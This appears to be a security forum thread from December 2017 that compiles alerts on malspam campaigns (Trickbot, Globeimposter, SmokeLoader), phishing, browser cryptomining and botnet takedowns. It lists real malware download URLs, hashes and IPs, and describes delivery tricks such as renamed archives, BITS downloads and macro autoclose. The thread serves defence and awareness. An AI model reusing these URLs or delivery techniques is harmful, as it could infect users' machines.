... Mitigation: This type of 'pop-under' is designed to bypass adblockers and is a lot harder to identify because of how cleverly it hides itself. Closing the browser using the “X” is no longer sufficient. The more technical users will want to run Task Manager* to ensure there is no remnant running browser processes and terminate them.
* https://www.howtogeek.com/66622/stupid-geek-tricks-6-ways-to-open-windows-task-manager/
Alternatively, the taskbar will still show the browser’s icon with slight highlighting, indicating that it is still running:
> https://blog.malwarebytes.com/wp-content/uploads/2017/11/win7_mitigation.png
> https://blog.malwarebytes.com/wp-content/uploads/2017/11/win10_mitigation.png
... Nearly two months since Coinhive’s inception, browser-based cryptomining remains highly popular, but for all the wrong reasons. Forced mining (no opt-in) is a bad practice, and any tricks like the one detailed in this blog are only going to erode any confidence some might have had in mining as an ad replacement. History shows us that trying to get rid of ads failed before, but only time will tell if this will be any different.
Unscrupulous website owners and miscreants alike will no doubt continue to seek ways to deliver drive-by mining, and users will try to fight back by downloading more adblockers, extensions, and other tools to protect themselves. If malvertising wasn’t bad enough as is, now it has a new weapon that works on all platforms and browsers."
Indicators of compromise:
145.239.64.86,yourporn[.]sexy,Adult site
54.239.168.149,elthamely[.]com,Ad Maven popunder
52.85.182.32,d3iz6lralvg77g[.]cloudfront.net,Advertiser's launchpad
54.209.216.237,hatevery[.]info,Cryptomining site
- https://centralops.net/co/DomainDossier.aspx
hatevery .info
52.72.157.243
54.156.6.169
52.200.89.230
52.54.161.204
54.84.183.12
34.237.128.64 ...
'Fast Flux' network: https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/
- https://www.helpnetsecurity.com/2017/11/30/browser-cryptomining-close-window/
Nov 30, 2017
:fear::fear: :mad:
AplusWebMaster
2017-12-01, 14:16
FYI...
Fake 'Visa notification' SPAM - delivers malware
- https://myonlinesecurity.co.uk/fake-visa-notification-with-password-protected-word-doc-delivers-malware/
1 Dec 2017 - "An email with the subject of Fwd:... (recipient’s name) pretending to come from Pamela <logo@ mensperl .edu> (probably random senders) with a malicious word doc attachment...
Update: I am reliably informed that it is Sigma ransomware[1] which appears to only run on a real computer, not a VM or Sandbox...
1] https://twitter.com/pcrisk/status/936534360148402176
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/visa_scan_doc.png
derek_scan.doc - Current Virus total detections 0/60*... Hybrid Analysis** (I forgot to try to insert password in the settings)
Word doc with password removed (VirusTotal 23/61***) (Hybrid Analysis[4]). This malware downloads from
http ://ypg7rfjvfywj7jhp .onion.link/icon.jpg -renamed- to svchost.exe by-the-macro on download
(VirusTotal 24/67[5]) (Hybrid Analysis[6])...
Word doc when first opened looks like this and you need to insert the password from the email body:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/Visa_scan_doc_pw_needed.png
Word doc after inserting password, telling you to enable editing & content:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/Visa_scan_doc_enable.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content... Do NOT enable Macros or editing under any circumstances... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/be3852eea1c2de1a9dd6dbbd6de9fe8330413989211f2e466b2b1c4d4c87a02b/analysis/1512109411/
** https://www.hybrid-analysis.com/sample/be3852eea1c2de1a9dd6dbbd6de9fe8330413989211f2e466b2b1c4d4c87a02b?environmentId=100
*** https://www.virustotal.com/en/file/ec9d519ea6c683f8813af50db2135a51bab17afd610095464ad7fda1cf836ae7/analysis/1512110582/
4] https://www.hybrid-analysis.com/sample/6f73b98463f02cefe7d6d96d56c8d8d8acd5e3b1e1b43e8f1b25b153f97aa24c?environmentId=100
DNS Requests
94.130.28.200
185.194.141.58
Contacted Hosts
185.194.141.58
94.130.28.200
163.172.176.167
199.254.238.52
5.39.92.199
159.203.15.100
87.118.112.63
165.227.135.224
93.115.95.38
5] https://www.virustotal.com/en/file/6f73b98463f02cefe7d6d96d56c8d8d8acd5e3b1e1b43e8f1b25b153f97aa24c/analysis/
icon.jpg
6] https://www.hybrid-analysis.com/sample/6f73b98463f02cefe7d6d96d56c8d8d8acd5e3b1e1b43e8f1b25b153f97aa24c?environmentId=100
DNS Requests
94.130.28.200
185.194.141.58
Contacted Hosts
185.194.141.58
94.130.28.200
163.172.176.167
199.254.238.52
5.39.92.199
159.203.15.100
87.118.112.63
165.227.135.224
93.115.95.38
___
Fake 'invoice' SPAM - delivers Globeimposter ransomware
- https://myonlinesecurity.co.uk/necurs-trying-to-deliver-globeimposter-ransomware-via-fake-invoices-with-broken-attachments/
1 Dec 2017 - "... from the Necurs botnet... an email with the subject of '12_Invoice_6856' (random numbers) coming from random email addresses... The bland email has what pretends to be a word doc attachment. It is NOT a word doc but a wrongly named .7z (zip) file. If you rename the 001_0343.doc to 001_0343.doc.7z it can be easily extracted to give a working vbs file...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/12_invoice_6856_email.png
001_0343.doc.7z: Extracts to: I912798654581.vbs - Current Virus total detections 9/60*. Hybrid Analysis**...
This particular example downloads from (there will be several others)
http ://pdj .co .id/UYTd46732? (VirusTotal 7/68[3])...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/9fa4ec5ad4ed0ed56e18d3e066f122637d980942661ca867dd52102cee73c8a0/analysis/1512125181/
I912798654581.vbs
** https://www.hybrid-analysis.com/sample/9fa4ec5ad4ed0ed56e18d3e066f122637d980942661ca867dd52102cee73c8a0?environmentId=100
DNS Requests
202.169.44.166
Contacted Hosts
202.169.44.166
88.99.66.31
3] https://www.virustotal.com/en/file/e2209f339b2e5afbb40d4f3dfddf4939ffdb9accbb5253121707a5b1cde15dd2/analysis/1512125396/
UYTd46732.exe
pdj .co .id: 202.169.44.166: https://www.virustotal.com/en/ip-address/202.169.44.166/information/
> https://www.virustotal.com/en/url/785c62c79e40a59e1ed35c05025f5187cdc343ba9e51fe60d24071dc4cc44742/analysis/
:fear::fear: :mad:
AplusWebMaster
2017-12-04, 15:22
FYI...
'Avalanche' takedown - with 'Andromeda'
- http://blog.shadowserver.org/2017/12/04/avalanche-year-two-this-time-with-andromeda/
Dec 4, 2017 - "On December 1st last year, the successful takedown* of the long-running criminal Avalanche double fast-flux-platform was announced by a consortium of international public and private partners, including The Shadowserver Foundation. This unprecedentedly complex operation was the culmination of over four-years of law enforcement and technical work, and impacted over twenty different malware families that utilized over 832,000 different DNS domains for Domain Generation Algorithms (DGAs) in -60- top level domains. Sinkhole data from the Avalanche platform is available each day in Shadowserver’s free of charge daily reports to national CERTs and network owners... with many victim computers still to be disinfected (you can find tools for disinfection here[1])...
* http://blog.shadowserver.org/2016/12/01/avalanche/
...
1] https://avalanche.shadowserver.org/
... On 29 November 2017, the Federal Bureau of Investigation (FBI), in close cooperation with the Luneburg Central Criminal Investigation Inspectorate in Germany, Europol’s European Cybercrime Centre (EC3), the Joint Cybercrime Action Task Force (J-CAT), Eurojust and private-sector partners The Shadowserver Foundation, Microsoft, The Registrar of Last Resort, Internet Corporation for Assigned Names and Numbers (ICANN) and associated domain registries, Fraunhofer Institute for Communication, Information Processing and Ergonomics (FKIE), and the German Federal Office for Information Security (BSI), as well as law enforcement representatives from Australia, Austria, Belarus, Belgium, Canada, Finland, France, Italy, the Montenegro, Netherlands, Poland, Singapore, Spain, the United Kingdom and Taiwan, announced** that they had dismantled one of the longest running malware families in existence – Andromeda (also known as Gamarue). At the same time, they also continued their existing legal and technical actions against over 848,000 Avalanche related command and control (C2) domains, to continue to protect existing victims and provide more time for any remaining victims to be identified and remediated...
** https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation
... They successfully extended and expanded sinkholing of the -21- malware families that made use of the Avalanche platform, and the associated takedown of the -Andromeda-botnet- is another great example of how complex international operations can successfully be jointly executed by a combination of cross-disciplinary public and private partners in the ongoing fight against cyber criminals globally."
(More detail at the URL at the top.)
> https://avalanche.shadowserver.org/stats/
> http://blog.shadowserver.org/wp-content/uploads/2017/12/Avalanche-Andromeda-map.png
> https://www.justice.gov/opa/pr/joint-statement-dismantling-international-cyber-criminal-infrastructure-known-avalanche
Dec 1, 2017 - "... The operation involves arrests and searches in five countries. More than -50- Avalanche servers worldwide were taken offline..."
Press Release Number: 16-1409
___
PayPal phish - 'verify transactions'
- https://blog.malwarebytes.com/cybercrime/2017/12/paypal-phish-asks-to-verify-transactions-dont-do-it/
Dec 1, 2017 - "There’s a number of -fake- PayPal emails going around right now claiming that a 'recent transaction can’t be verified'... Here’s two examples of how these mails are being named from one of our mailboxes:
> https://blog.malwarebytes.com/wp-content/uploads/2017/12/paypal-phish-mails.jpg
Here’s the most recent email in question:
> https://blog.malwarebytes.com/wp-content/uploads/2017/12/paypal-phish-mail.jpg
Clicking the button takes potential victims to a -fake- PayPal landing page, which tries very hard to direct them to a “resolution center”:
> https://blog.malwarebytes.com/wp-content/uploads/2017/12/fake-paypal-landing-page.jpg
The URL is:
myaccounts-webapps-verify-updated-informations(dot)epauypal(dot)com/myaccount/e6abe
epauypal(dot)com: A temporary error occurred during the lookup...
From here, it’s a quick jump to two pages that ask for the following slices of personal information and payment data:
1. Name, street address, city, state, zip, country, phone number, mother’s maiden name, and date of birth
2. Credit card information (name, number, expiration code, security code)
> https://blog.malwarebytes.com/wp-content/uploads/2017/12/paypal-phish-website-personal-info-request.jpg
... Whatever your particular spending circumstance, wean yourself away from clicking on -any- email-link where claims of payment or requests for personal information are concerned. Take a few seconds to manually navigate to the website in question. and log in directly instead. If there are any payment hiccups happening behind the scenes, you can sort things out from there. Scammers are banking on the holiday rush combined with the convenience of “click link, do thing” to steal cash out from under your nose..."
- https://www.helpnetsecurity.com/2017/12/04/paypal-holiday-phishing/
Dec 4, 2017
___
> https://www.databreaches.net/paypal-admits-acquired-company-suffered-major-breach/
Dec 4, 2017
> https://www.theregister.co.uk/2017/12/04/paypal_tio_data_breach/
Dec 4, 2017
> http://www.tio.com/
Dec 1, 2017
:fear::fear: :mad:
AplusWebMaster
2017-12-05, 12:38
FYI...
Fake 'Message' SPAM - delivers Globeimposter ransomware
- https://myonlinesecurity.co.uk/globeimposter-ransomware-continues-to-be-delivered-via-necurs-botnet-using-fake-scanner-or-printer-messages/
5 Dec 2017 - "... downloaders from the Necurs botnet... an email with the subject of 'Message from G10PR0378651 .victimsdomain .com' pretending to come from random names at your own email address or company domain... The attachment says it is a zip file but is actually a 7z file renamed to zip...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/message-from-G10PR0378651.png
201712054051.zip: Extracts to: MSC000000981631.vbs - Current Virus total detections 2/59*. Hybrid Analysis**...
This particular version downloads from
http ://rorymartin8 .info/hudgy356? (there will be dozens of others) (VirusTotal 4/56[3])...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/7a18bffd01eeab08a3f88d35ba5d09106690ea62d01e43d950b6b842ab6c4e76/analysis/1512468367/
MSC000000981631.vbs
** https://www.hybrid-analysis.com/sample/7a18bffd01eeab08a3f88d35ba5d09106690ea62d01e43d950b6b842ab6c4e76?environmentId=100
DNS Requests
192.185.193.214
Contacted Hosts
192.185.193.214
3] https://www.virustotal.com/en/file/c0ce6c2f03e3174d347eb2136a230883a725fcd5179221f61435ea709a2ba81f/analysis/1512468259/
rorymartin8 .info: 192.185.193.214: https://www.virustotal.com/en/ip-address/192.185.193.214/information/
> https://www.virustotal.com/en/url/7fa3bd7cc14ec19c942968a53ef8bc75ec706ee75dd7bec4f89d0a2f87976399/analysis/
:fear::fear: :mad:
AplusWebMaster
2017-12-06, 13:11
FYI...
Fake 'documents' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/trickbot-delivered-via-fake-lloyds-bank-confidential-account-documents-malspam/
6 Dec 2017 - "... an email containing the subject of 'Confidential account documents' pretending to come from Lloyds Bank but actually coming from a look-a-like or typo-squatted domain <secure@ lloyds-commercial .com > with a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/lloyds-commercial_trickbot.png
Protected32.doc - Current Virus total detections 3/59*. Hybrid Analysis**...
This malware docx file downloads from
http ://undergroundis .com/images/logo.png which of course is -not- an image file but a renamed .exe file that gets renamed to Wkob.exe (VirusTotal 13/67***)... DO NOT follow the advice they give to enable macros or enable editing to see the content..."
* https://www.virustotal.com/en/file/38de462234607711e55c4dca1f74bec77db5586330b1ccb09696e55257709212/analysis/1512558154/
Protected32.doc
** https://www.hybrid-analysis.com/sample/38de462234607711e55c4dca1f74bec77db5586330b1ccb09696e55257709212?environmentId=100
DNS Requests
216.239.36.21
192.254.225.208
Contacted Hosts
192.254.225.208
216.239.36.21
185.158.114.106
92.53.66.115
*** https://www.virustotal.com/en/file/294279f9b222dfb98f10d814717ac2f3bf9f683290723f272c4cff984e79a7a3/analysis/1512558724/
undergroundis .com: 192.254.225.208: https://www.virustotal.com/en/ip-address/192.254.225.208/information/
> https://www.virustotal.com/en/url/bfea78cd1065f0b94606e5a7c877a073ab9665fdec663d45f5cbeb2030c8f625/analysis/
___
Google update 'glitch' disconnects student Chromebooks in schools across the U.S.
- https://www.geekwire.com/2017/reported-google-update-glitch-disconnects-student-chromebooks-schools-across-u-s/
Dec 5, 2017 at 4:59 pm - "... Tens of thousands, perhaps millions, of Google Chromebooks, widely prized by schools due to their low cost and ease of configuration, were reported to be offline for several hours on Tuesday. The apparent cause? A seemingly -botched- WiFi policy update pushed out by Google that caused many Chromebooks to forget their approved network connection, leaving students disconnected.
Google first gave schools a heads-up via Twitter after the fact, indicating there was a fix.
'We're aware of a wifi connectivity outage that affected some Chromebooks today. The issue is resolved. To get your Chromebooks online: reboot & manually join a WiFi network or connect via ethernet to receive a policy update. Sorry for the disruption & thank you for your patience.
— Google For Education (@GoogleForEdu) December 5, 2017'
- https://twitter.com/GoogleForEdu/status/938159020082376704?ref_src=twsrc%5Etfw
That disclosure led to dismayed reaction by educators, some of whom had Chromebook installations in the thousands... GeekWire reached out to Google for more information about the cause and scope of the Chromebook issue, and will update this post if more details become available."
> https://cdn.geekwire.com/wp-content/uploads/2017/12/DownDetectorGoogle120517.png
Current Status: http://downdetector.com/status/google
'Google problems last 24 hours'
>> https://support.google.com/chrome/a/answer/7583402
Article last updated on Dec 6, 2017
:fear::fear: :mad:
AplusWebMaster
2017-12-07, 15:22
FYI...
Fake 'account documents' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/trickbot-via-fake-companies-house-secure-form-malspam/
7 Dec 2017 - "... an email containing the subject of 'Your account documents' pretending to come from Companies House but actually coming from a look-a-like or typo-squatted domain <no-reply@ companieshouseform .co.uk> with a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/companies-house-secure-form.png
SecureForm84.doc - Current Virus total detections 3/60*| Hybrid Analysis**... This malware docx file downloads from
http ://aperhu .com/ser0712.png which of course is -not- an image file but a renamed .exe file that gets renamed to Ejjmdejh9.exe (VirusTotal 8/68[3])...
The alternative download location is
http ://altarek .com/ser0712.png... Today’s example of the spoofed domain is, as usual, registered via Godaddy as registrar using privacy protection services...
companieshouseform .co.uk hosted on numerous servers and IP addresses and sending the emails via 185.207.204.218 | 185.23.215.76 | 89.39.106.208 | All of which are based in Netherlands...
Malware detail:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/companies-house-secure-form_word_doc.png
DO NOT follow the advice they give to enable macros or enable editing to see the content..."
* https://www.virustotal.com/en/file/2c258ffcf53a2bbf22356b58f2baff72ce01f1ca3c28a8c9e6e84b2d0848f588/analysis/1512651253/
SecureForm6.doc
** https://www.hybrid-analysis.com/sample/2c258ffcf53a2bbf22356b58f2baff72ce01f1ca3c28a8c9e6e84b2d0848f588?environmentId=100
DNS Requests
146.255.36.1
143.95.252.46
Contacted Hosts
143.95.252.46
146.255.36.1
185.80.128.223
82.146.47.221
185.125.46.161
3] https://www.virustotal.com/en/file/bb82bcef4bfcb5b06a6f8e2de74321468212feea31ec2f132fa842271f045071/analysis/1512647520/
fbwnk.exe
aperhu .com: 143.95.252.46: https://www.virustotal.com/en/ip-address/143.95.252.46/information/
> https://www.virustotal.com/en/url/8a56867ddc4787930a1e16508a833b92387f209c53a1a2c999666097f55001d0/analysis/
altarek .com: 64.50.184.217: https://www.virustotal.com/en/ip-address/64.50.184.217/information/
> https://www.virustotal.com/en/url/c11005bca59161744c41b6c7fa0ee774564d9bdea584e2bf3157af9eee2e50bb/analysis/
:fear::fear: :mad:
AplusWebMaster
2017-12-12, 14:20
FYI...
Fake 'Amazon invoice' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/fake-amazon-marketplace-invoice-emails-deliver-ransomware-via-necurs-botnet/
12 Dec 2017 - "... Necurs botnet has changed again today...
Update: I am informed that this is definitely Trickbot banking trojan, not ransomware, although several antiviruses are detecting it as a ransomware version. An email with the subject of 'Invoice RE-2017-12-12-00572' (random numbers after the date) pretending to come from Amazon Marketplace <lqftdwbmxYYfT@ marketplace.amazon .com> (random characters before the @) with a malicious word doc attachment...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/necurs_amazon_marketplace.png
RE-2017-12-12-00572.doc - Current Virus total detections 12/59*. Hybrid Analysis**...
This malware downloads from
http ://ragazzemessenger .com/nyRhdkwSD which gave ejmaryj8.exe (VirusTotal 9/67[3]) (Hybrid Analysi[4])...
There will be loads of other download sites... DO NOT follow the advice they give to enable macros or enable editing to see the content..."
* https://www.virustotal.com/en/file/89cdf68a65bc1bc227ac696ef9e8e74a654319518f84428ca71d1bce270a661e/analysis/1513080354/
RE-2017-12-12-00775.doc
** https://www.hybrid-analysis.com/sample/89cdf68a65bc1bc227ac696ef9e8e74a654319518f84428ca71d1bce270a661e?environmentId=100
DNS Requests
158.69.26.138
98.124.251.168
Contacted Hosts
98.124.251.168
158.69.26.138
67.209.219.92
179.43.147.243
95.213.237.241
3] https://www.virustotal.com/en/file/274170f2acf032561911675964fe1852e63e5af6bf97c3a76d6273cf7b5bf1c0/analysis/1513080273/
4] https://www.hybrid-analysis.com/sample/274170f2acf032561911675964fe1852e63e5af6bf97c3a76d6273cf7b5bf1c0?environmentId=100
ragazzemessenger .com: 98.124.251.168: https://www.virustotal.com/en/ip-address/98.124.251.168/information/
> https://www.virustotal.com/en/url/a889ef86e763ccc81667244efcdfc42f8fdc14b6daba70a33db05fa7c29c4c38/analysis/
:fear::fear: :mad:
AplusWebMaster
2017-12-15, 12:14
FYI...
Fake 'Scan' SPAM - delivers Globeimposter ransomware
- https://myonlinesecurity.co.uk/another-necurs-mistake-tries-to-deliver-globeimposter-ransomware-but-fails/
15 Dec 2017 - "... Necurs botnet has messed up again today... an email with the subject of 'Scan' pretending to come from random names and email addresses... It is trivially easy to decode the base64 section, create the 7z file & extract the vbs to get the Globeimposter ransomware they are attempting to deliver. Over the last few weeks we have seen this behaviour several times. Sometimes with 7z or zip files. Sometimes with word docs...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/2017-12-15_08-02-13.png
Scan_00057.7z: - Extracts to: Scan_005287.vbs - Current Virus total detections 7/60*. Hybrid Analysis**...
This particular version downloads from
http ://peopleiknow .org/JKHhgdf72? - there will be several other locations in -other- vbs files...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/8a9728267c3facb34c92e769a5d70392d9393752bd030bf2e8679319b12ccce5/analysis/1513324220/
Scan_005287.vbs
** https://www.hybrid-analysis.com/sample/8a9728267c3facb34c92e769a5d70392d9393752bd030bf2e8679319b12ccce5?environmentId=100
peopleiknow .org: 67.210.102.240: https://www.virustotal.com/en/ip-address/67.210.102.240/information/
> https://www.virustotal.com/en/url/1e01c9c077b0a31fc1a4feaf40cdaa1fec6b7ea5ed7c81191629026a7fe43e61/analysis/
___
Fake FBI phish - leads to Tech Support Scam
- https://myonlinesecurity.co.uk/fake-fbi-you-are-a-victim-of-cyber-crime-message-leads-to-tech-support-scam/
14 Dec 2017 - "... It pretends to be a message from the FBI saying you might be a victim of cyber crime and you should ring the phone number in the email. The phone number belongs to a dubious Tech Support service:
globalphonesupport .com: 69.89.31.186: https://www.virustotal.com/en/ip-address/69.89.31.186/information/
If you are unwise enough to ring the number you will be falsely told that there is something wrong with your computer. 'It needs cleaning'... and it will cost you at least one hundred USD to repair.
It is highly likely that these scammers will ask you to install a 'remote access program' (although they call it something else)...
Unusually there is no link in this email. [Some] of these scams will have a link that leads to page saying your computer is infected with Zeus trojan or similar that locks-the-browser and displays the phone number to ring...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/fake_FBI_tech_support-Scam.png
" ... RE: Case: 8755174734
The IP address registered on your name was referred to our ICC Center multiple times as being a possible victim of cyber crime.
We believe that your IP address and other identifying information were used to commit several computer fraud and abuse crimes. This investigation covers the time period from August 7, 2017 to the present date.
We appreciate your instant assistance to this matter. Please contact us urgently with all of the information concerning this case, at telephone number listed below... "
These emails use Social engineering tricks to persuade you to open the attachments, follow links or ring the phone number in the email...
___
AIM - discontinued on Dec 15, 2017
- https://help.aol.com/articles/aim-discontinued
"As of December 15, 2017, AOL Instant Messenger products and services will be shut down and will no longer work.
If you are an AOL member, AOL products and services like AOL Mail, AOL Desktop Gold and Member Subscriptions will not be affected. To view your benefits, please visit: https://mybenefits.aol.com/ "
:fear::fear: :mad:
AplusWebMaster
2017-12-20, 14:38
FYI...
Fake 'Website Job Application' SPAM - delivers malware
- https://myonlinesecurity.co.uk/more-resume-malspam-with-password-protected-word-doc-attachments-continue-to-plague-us-delivering-a-variety-of-different-malware/
20 Dec 2017 - "... This is a continuation from these 3 previous posts about malware using resumes or job applications as the lure [1] [2] [3]... The primary change in delivery method is the use of a password for the word doc to try to bypass antivirus filters... Today’s version continues to SmokeLoader/Sharik trojan which is a downloader for -other- malware. An email with the subject of 'Website Job Application' coming from Rob Meyers <Gong@ latestmistake .com> (probably random names) with a malicious word doc attachment delivers SmokeLoader/ sharik trojan...
1] https://myonlinesecurity.co.uk/website-job-application-fake-resume-delivers-globe-ransomware/
2] https://myonlinesecurity.co.uk/spear-phishing-fake-resume-malspam-leads-to-malware/
3] https://myonlinesecurity.co.uk/fake-resume-emails-continue-to-deliver-malware/
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/rob_resume_eml-1.png
Rob Resume.doc - Current Virus total detections 11/59*. Hybrid Analysis**... It should be noted that this malicious word doc and the downloaded malware either has some sort of anti-analysis protection or the malware delivery site will reject connections from known sandboxes, VM analysis tools and known researcher or antivirus IP addresses. Neither of the 2 Online sandboxes / analysis tools could retrieve the downloaded malware. That had to be done manually. They have continued with the previous behaviour of using BITS (bitsadmin.exe) to download the file instead of PowerShell. They also are still using “autoclose” in the macro so it doesn’t run until the word doc has been closed, so avoiding any obvious signs of infiltration. Also the downloaded file sleeps for a long, long time before doing anything. This malware downloads from
http ://80.82.67.217/paddle.jpg which of course it -not- an image file but a renamed .exe (ASxas.exe)
VirusTotal 8/67[4]. Hybrid Analysis[5]... HA shows a further download of a bitcoin miner (VirusTotal 43/66[6])
but Anyrun could not get anything despite leaving it running for 10 minutes...
This word doc looks like this:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/rob_resume_1_doc.png
And after you input the password from the email body (123456) you see a typical page asking you to enable editing and then macros and content:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/rob_resume_2_doc.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/d16987127fb303ccee876d2b3ec3798f4d31a659b2a5da32be598f2c32d48a21/analysis/1513715092/
Resume.doc
** https://www.hybrid-analysis.com/sample/d16987127fb303ccee876d2b3ec3798f4d31a659b2a5da32be598f2c32d48a21?environmentId=100
4] https://www.virustotal.com/en/file/f181aafa4cc93117631f2376cb3543d7f4f6c0570cf95cb8bb526e99ab56f095/analysis/1513716371/
paddle.jpg.exe
5] https://www.hybrid-analysis.com/sample/f181aafa4cc93117631f2376cb3543d7f4f6c0570cf95cb8bb526e99ab56f095?environmentId=100
DNS Requests
37.59.55.60
107.181.246.221
Contacted Hosts
139.59.208.246
107.181.246.221
188.165.214.95
6] https://www.virustotal.com/en/file/954e8e88740fd3e659fd4ad0502982dd173db2d90cfca0718bfc739bf886d51c/analysis/
bitcoinminer1
80.82.67.217: https://www.virustotal.com/en/ip-address/80.82.67.217/information/
> https://www.virustotal.com/en/url/f4d8159d93a6824ce918d245181f06263e3b66da31d15c9d1b70cb70d3b4cbe9/analysis/
___
Office as a malware delivery platform: DDE, Scriptlets, Macro obfuscation
... Powerful behind-the-scenes features in Office have suddenly stepped back into the malware limelight, with an onslaught of mostly macro-less attacks starring jimmied Word, Excel and PowerPoint documents
> https://www.computerworld.com/article/3244084/microsoft-windows/office-as-a-malware-delivery-platform-dde-scriptlets-macro-obfuscation.html
Dec 19, 2017 - "... Some clever researchers have found new and unexpected ways to get Word, Excel and PowerPoint documents to deliver all sorts of malware — ransomware, snoopers, even a newly discovered credential stealer that specializes in gathering usernames and passwords. In many cases, these new uses employ methods as old as the hills. But the old warning signs don’t work as well as they once did..."
(Much more detail at the computerworld URL above.)
ADV170021 | Microsoft Office Defense in Depth Update
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV170021
12/12/2017 - "... provides enhanced security as a defense-in-depth measure. The update disables the Dynamic Update Exchange protocol (DDE) in all supported editions of Microsoft Word..." - Also:
> https://docs.microsoft.com/en-us/security-updates/securityadvisories/2017/4053440
Updated: Dec 12, 2017
>> https://www.askwoody.com/forums/topic/office-as-a-malware-delivery-platform-dde-scriptlets-macro-obfuscation/#post-153388
Dec 20, 2017
:fear::fear: :mad:
AplusWebMaster
2017-12-21, 14:29
FYI...
DoubleClick Advertising network XSS vuln
- https://myonlinesecurity.co.uk/doubleclick-advertising-network-xss-vulnerability/
21 Dec 2017 - "Just a quick alert about an email from Google warning of vulnerabilities in some DoubleClick publishers. This has been sent to all website owners who use DoubleClick in any form. However this will ONLY affect website owners who use DoubleClick as a stand alone service to display adverts. It does not affect website owners who use Google AdSense to display adverts and have enabled the additional options to also use DoubleClick as a method of advertising in the allowed advertisers section of your Google AdSense settings page:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/doubleclick_XSS_alert.png
The email reads:
'Dear Customer,
We’ve identified certain vendor files that may contain XSS vulnerabilities which could pose a security risk. Please check if you are hosting these files and remove them with the help of your webmaster. These are the currently identified third-party vendor files...'"
(More detail at the myonlinesecurity URL above.)
> https://support.google.com/dfp_premium/answer/7622991
___
Cryptominers...
- https://umbrella.cisco.com/blog/2017/12/19/mounting-mining-mayhem/
Dec 19, 2017 - "As cryptocurrencies continue to increase in value, cryptomining becomes increasingly more lucrative. With Bitcoin nearly reaching $18,000USD/1BTC, speculation that other cryptocurrencies such as Etherium and Monero may hit this mark eventually is rising. Monero is especially interesting given that one of its primary advantages is the relatively low processing power needed to mine it. Given that it is capable of being mined even by consumer grade computers, many organizations have tried to capitalize on this facet of the currency.
> https://s3-us-west-1.amazonaws.com/umbrella-blog-uploads/wp-content/uploads/2017/12/14112021/RiseOfTheCoin.png
Launched in September of this year, Coinhive is a service that has transformed the internet already in its short life. 'Coinhive' allows users to embed JavaScript API calls to enable anonymous mining of Monero cryptocurrency in browsers. 'Monero' aims to improve on existing cryptocurrency design by obscuring the sender, recipient and amount of every transaction made, as well as making the mining process more egalitarian by lowering processing costs. Though Coinhive as an organization has said they want users to come up with new uses for their service, it’s hard to imagine they wanted users to create apps that then go on to be abused...
It’s impossible to say with accuracy where the future will take cryptocurrencies or cryptominers, but they’re almost certainly here to stay. As the internet continues to evolve in its third decade of existence, enterprising individuals will always be looking for the next motherlode, taking advantage of a landscape that others can’t see."
(More detail at the umbrella.cisco URL above.)
:fear::fear::fear:
AplusWebMaster
2017-12-22, 13:31
FYI...
Fake 'Outstanding Statement' SPAM - delivers ransomware
- https://myonlinesecurity.co.uk/fake-prime-express-travel-statement-delivers-globeimposter-ransomware/
22 Dec 2017 - "... malware downloaders from the Necurs botnet... an email with the subject of 'Outstanding Statement' pretending to come from Prime Express Oldham <sales62@ primeexpressuk .com> (random numbers after sales) delivering Globeimposter ransomware...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/2017-12-22_11-48-59.png
Customer Statement (122017_6816162).7z: Extracts to: Customer Statement (122017_51767638).js
Current Virus total detections 16/55*. Hybrid Analysis**...
This js file downloads from
http ://www.upperlensmagazine .com/tOldHSYW??DVTCGAtym=DVTCGAtym (VirusTotal 11/68[3]). As usual there will be 6 or 8 other download sites... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/794dcfdcc1362140eee6fcda11ddf239ab048a965bba634bb787321db9672cfa/analysis/1480616575/
-6dt874p53077.js
** https://www.hybrid-analysis.com/sample/acbecd62827ce0090665d5a9adb5ca27837432b19bd64f83542c17fbe0be74a2?environmentId=100
DNS Requests
45.126.209.154
Contacted Hosts
45.126.209.154
3] https://www.virustotal.com/en/file/da3ab88c61deabf4cb4d296cc0b4a586eeedc89e87adc4ea648ab8fe6a41346c/analysis/1513941343/
GWMadFzby2.exe
upperlensmagazine .com: 45.126.209.154: https://www.virustotal.com/en/ip-address/45.126.209.154/information/
> https://www.virustotal.com/en/url/3d44d1e7fcf73afeb2338e8159d6e252f5e439b6aceae0216c16433011d3ae1b/analysis/
:fear::fear: :mad:
AplusWebMaster
2017-12-24, 15:37
FYI... Bah Humbug! ...
Fake 'UPS Invoice' SPAM - delivers Java Adwind
